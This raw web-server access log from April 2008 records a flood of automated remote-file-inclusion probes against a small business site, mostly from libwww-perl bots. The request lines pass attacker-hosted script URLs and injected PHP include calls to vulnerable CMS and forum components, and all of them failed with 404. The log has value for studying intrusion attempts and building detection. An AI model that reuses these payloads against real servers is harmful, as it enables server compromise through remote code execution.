205.234.242.100 - - [01/Apr/2008:02:25:23 -0700] "GET /index.php?body=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:25:55 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:25:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:25:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:02:26:14 -0700] "GET /componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:26:17 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:02:26:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:02:26:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:26:28 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:26:50 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:26:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:26:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:02:27:13 -0700] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:02:27:13 -0700] "GET /logs/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:02:28:19 -0700] "GET /logs/access_071231.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:02:28:19 -0700] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.16.236.69 - - [01/Apr/2008:02:28:40 -0700] "GET /componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:02:28:59 -0700] "GET /logs/index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.242.100 - - [01/Apr/2008:02:28:59 -0700] "GET /index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:02:29:05 -0700] "GET /logs/access.log/admin_view_image.php?cid=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:02:29:05 -0700] "GET /admin_view_image.php?cid=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:02:29:05 -0700] "GET /logs/admin_view_image.php?cid=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:02:29:32 -0700] "GET /logs/access_080201.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:31:27 -0700] "GET /logs/access.log//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:31:27 -0700] "GET //newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:31:27 -0700] "GET /logs//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:33:37 -0700] "GET /logs/access_080101.log//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
83.205.101.218 - - [01/Apr/2008:02:33:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.avedila.com/avedila/.../puki.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.bsfadvisors.com"
83.205.101.218 - - [01/Apr/2008:02:33:53 -0700] "GET //config/dbutil.bck.php?confdir=http://www.avedila.com/avedila/.../puki.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.bsfadvisors.com"
83.205.101.218 - - [01/Apr/2008:02:33:54 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.avedila.com/avedila/.../puki.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:02:37:23 -0700] "GET /logs/access_080201.log/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:02:37:29 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:02:37:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:02:37:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:02:40:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:02:40:11 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.bsfadvisors.com"
67.195.44.110 - - [01/Apr/2008:02:40:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
67.195.44.75 - - [01/Apr/2008:02:40:15 -0700] "GET /logs/access_080101.log HTTP/1.0" 200 166838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
85.204.231.202 - - [01/Apr/2008:02:42:53 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd.2txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
85.204.231.202 - - [01/Apr/2008:02:42:54 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd.2txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
85.204.231.202 - - [01/Apr/2008:02:42:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd.2txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:02:43:06 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:02:43:06 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:02:43:08 -0700] "GET /logs/access_080101.log/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.16.236.69 - - [01/Apr/2008:02:48:04 -0700] "GET /logs/access.log/componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
208.16.236.69 - - [01/Apr/2008:02:48:04 -0700] "GET /logs/componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:02:48:56 -0700] "GET /logs/access.log/componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:02:48:56 -0700] "GET /logs/componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.114.132.12 - - [01/Apr/2008:02:52:34 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.bsfadvisors.com"
85.114.132.12 - - [01/Apr/2008:02:52:34 -0700] "GET /logs/include/print_category.php?setup[use_category]=1&dir=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.bsfadvisors.com"
211.58.254.89 - - [01/Apr/2008:02:53:45 -0700] "GET /logs/index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.58.254.89 - - [01/Apr/2008:02:53:45 -0700] "GET /index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:02:54:07 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:02:54:09 -0700] "GET //skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:02:54:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.230.7.194 - - [01/Apr/2008:02:54:50 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.silak.eu//components/com_rwcard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
87.230.7.194 - - [01/Apr/2008:02:54:50 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.silak.eu//components/com_rwcard/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:56:04 -0700] "GET /logs/access.log//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:56:04 -0700] "GET //newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:56:04 -0700] "GET /logs//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:02:57:52 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:02:58:27 -0700] "GET /logs/access_080101.log//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:02:58:46 -0700] "GET /componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:02:58:47 -0700] "GET /componentscom_cpgcpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:02:59:01 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:02:59:01 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:02:59:02 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:02:59:02 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
74.6.22.120 - - [01/Apr/2008:03:05:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.21.190 - - [01/Apr/2008:03:05:25 -0700] "GET /menus/awmData-sub_pages_menu/ HTTP/1.0" 200 1807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.52.27.146 - - [01/Apr/2008:03:06:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
74.52.27.146 - - [01/Apr/2008:03:07:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:03:07:31 -0700] "GET /logs/access.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:03:07:43 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:03:07:51 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.212.235.131 - - [01/Apr/2008:03:07:58 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:03:08:20 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
124.51.67.46 - - [01/Apr/2008:03:09:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
66.225.192.249 - - [01/Apr/2008:03:09:32 -0700] "GET //config/dbutil.bck.php?confdir=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:03:10:49 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:03:10:58 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:03:10:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:03:10:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:03:11:10 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.16.114.162 - - [01/Apr/2008:03:16:09 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:03:16:58 -0700] "GET /logs/access_080201.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:03:20:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:03:21:54 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:22:59 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:23:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:23:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
65.214.45.101 - - [01/Apr/2008:03:25:35 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.bsfadvisors.com"
65.214.45.101 - - [01/Apr/2008:03:26:58 -0700] "GET /images/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:03:32:53 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:03:32:53 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:03:32:59 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:03:33:00 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:33:12 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:33:14 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:33:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:03:33:47 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:03:33:47 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:36:02 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:03:36:05 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:03:36:05 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:03:37:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:03:37:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:37:48 -0700] "GET /logs/access.log//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:37:50 -0700] "GET //newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
67.15.155.34 - - [01/Apr/2008:03:37:51 -0700] "GET /logs//newspublish/samplenewspublish.php?path[docroot]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:03:38:01 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:03:38:02 -0700] "GET /index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:03:38:05 -0700] "GET /logs/index.php?body=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
